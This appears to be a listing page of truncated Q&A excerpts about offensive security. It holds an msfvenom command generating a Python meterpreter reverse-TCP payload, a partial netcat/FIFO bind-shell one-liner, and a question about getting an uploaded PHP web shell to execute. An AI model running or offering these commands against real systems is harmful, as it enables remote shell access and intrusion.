How can I prevent msfvenom Python payloads from forking without manually decoding the payload?

I am generating a Python payload using msfvenom with the following command:
msfvenom -p python/meterpreter_reverse_tcp -f raw –platform python -e generic/none -a python LHOST= LPORT=9090 -o
The payload … Continue reading How can I prevent msfvenom Python payloads from forking without manually decoding the payload?

Differences in behavior between two Netcat and FIFO commands for creating a bind shell

I am trying to grasp the concept of terminal-emulators, shells and redirections.
I have two commands, both of them start a netcat listener for the bind shell:
1) rm /tmp/fifo; mkfifo /tmp/fifo; cat /tmp/fifo | /bin/bash -i 2>&1 | nc… Continue reading Differences in behavior between two Netcat and FIFO commands for creating a bind shell

Why does my uploaded shell as .php gets downloaded rather than executed when I hit the URL?

I have uploaded a php shell using a file upload vulnerability. But when I hit the .php url after uploading it. It gets downloaded rather than executed. Why is that. And how can I execute my shell code?
This is the URL that it gets uploaded… Continue reading Why does my uploaded shell as .php gets downloaded rather than executed when I hit the URL?